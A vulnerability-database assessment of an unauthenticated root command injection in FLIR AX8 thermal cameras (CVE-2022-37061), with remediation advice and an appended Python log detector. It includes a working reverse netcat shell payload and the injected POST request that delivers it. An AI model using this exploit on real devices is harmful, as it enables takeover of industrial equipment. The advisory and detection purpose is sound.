CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score Confidence: High
EPSS Percentile: 100.0%
All FLIR AX8 thermal sensor cameras with firmware version up to and including 1.46.16 are vulnerable to remote command injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter of the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.
Recent assessments:
h00die-gr3y at October 20, 2022 7:41pm UTC reported:
FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provide continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
This device is typically used for monitoring industrial environments in a LAN based configuration. Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.
FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including 1.46.16.
The endpoint /res.php can be called remotely without user authentication, as there is no cookie verification (Cookie: PHPSESSID=ID) to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command, as demonstrated in the example below.
Create a netcat reverse shell payload with msfvenom:
# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.100.7 LPORT=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 100 bytes
mkfifo /tmp/ibcnr; nc 192.168.100.7 4444 0</tmp/ibcnr | /bin/sh >/tmp/ibcnr 2>&1; rm /tmp/ibcnr
Use this payload in a Burp POST request using the vulnerable id parameter to launch a netcat shell. Note: do not forget to apply the URL encoding.
POST /res.php HTTP/1.1
Host: 192.168.100.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 174
action=alarm&id=2;mkfifo%20%2ftmp%2fibcnr%3b%20nc%20192.168.100.7%204444%200%3c%2ftmp%2fibcnr%20%7c%20%2fbin%2fsh%20%3e%2ftmp%2fibcnr%202%3e%261%3b%20rm%20%2ftmp%2fibcnr
Click send and you will receive a netcat shell on the attacker host.
# nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 51556
whoami
root
uname -a
Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux
The root cause of this command injection vulnerability is the lack of sanitization checks on the variable $_POST["id"], line 65 in the file /FLIR/usr/www/res.php; malicious actors can therefore take advantage of the shell_exec() function to execute unexpected arbitrary shell commands.
Besides this vulnerability, three other vulnerabilities were identified. Check the respective CVEs for more info.
[CVE-2022-37060] – Unauthenticated Directory Traversal
[CVE-2022-37062] – Improper Access Control
[CVE-2022-37063] – Reflected cross-site scripting
As stated in the beginning of this analysis, it is very unlikely to find this type of device exposed to the Internet, but you will find them quite often in industrial environments deployed in a LAN based configuration.
I have created Metasploit module exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061 that will check if the device is vulnerable and launch a reverse netcat shell or meterpreter session on a vulnerable device. You can download this module from the link in the reference section below and follow the instructions to run it locally.
Pushing this module to the Metasploit mainstream is in progress.
Upgrade the camera to a firmware version higher than 1.46.16.
Packetstorm
Metasploit Development h00die-gr3y
Credit goes to the security researchers below who discovered these vulnerabilities.
Assessed Attacker Value: 5
packetstormsecurity.com/files/168114/FLIX-AX8-1.46.16-Remote-Command-Execution.html
packetstormsecurity.com/files/168116/FLIR-AX8-1.46.16-Traversal-Access-Control-Command-Injection-XSS.html
packetstormsecurity.com/files/169701/FLIR-AX8-1.46.16-Remote-Command-Injection.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37061
gist.github.com/Nwqda/9e16852ab7827dc62b8e44d6180a6899
www.flir.com/products/ax8-automation/
www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
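As an added example (not part of the assessment above or of the Metasploit module), the following Python checks web-server request records for the pattern described in the analysis: a POST to /res.php whose id parameter is anything other than the plain integer the alarm endpoint expects. The sample records are constructed; the suspicious body is the request body shown in the write-up, and the benign bodies are an assumption about what the web UI normally sends.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample records (source IP, request line, URL-encoded body).
# The benign bodies are an assumption about what the web UI normally sends;
# the suspicious one is the request body shown in the write-up.
SAMPLE_REQUESTS = [
    ("192.168.100.9", "POST /res.php", "action=alarm&id=2"),
    ("192.168.100.7", "POST /res.php",
     "action=alarm&id=2;mkfifo%20%2ftmp%2fibcnr%3b%20nc%20192.168.100.7%204444"
     "%200%3c%2ftmp%2fibcnr%20%7c%20%2fbin%2fsh%20%3e%2ftmp%2fibcnr%202%3e%261"
     "%3b%20rm%20%2ftmp%2fibcnr"),
    ("192.168.100.9", "POST /res.php", "action=alarm&id=17"),
    ("192.168.100.5", "GET /index.php", ""),
]

# Shell metacharacters that never belong in an alarm id.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")

def parse_body(body):
    """Split a form body on '&' before percent-decoding, so an encoded
    '%26' inside a value (as in '2>&1') is not mistaken for a separator."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def analyze_request(src, request_line, body):
    """Return a finding for a suspicious res.php call, or None if benign.
    The allow-list check (id must be a plain integer) is the same test the
    endpoint itself should apply before anything reaches shell_exec()."""
    if not request_line.startswith("POST /res.php"):
        return None
    for value in parse_body(body).get("id", []):
        if value.isdigit():
            continue
        hit = SHELL_META.search(value)
        return {
            "src": src,
            "id_value": value,
            "reason": "shell metacharacter in id" if hit else "non-numeric id",
        }
    return None

def scan(requests):
    """Run analyze_request over every record and keep the findings."""
    return [f for f in (analyze_request(*r) for r in requests) if f]
```

scan(SAMPLE_REQUESTS) returns one finding, for the 192.168.100.7 record, with the decoded id value and the reason "shell metacharacter in id".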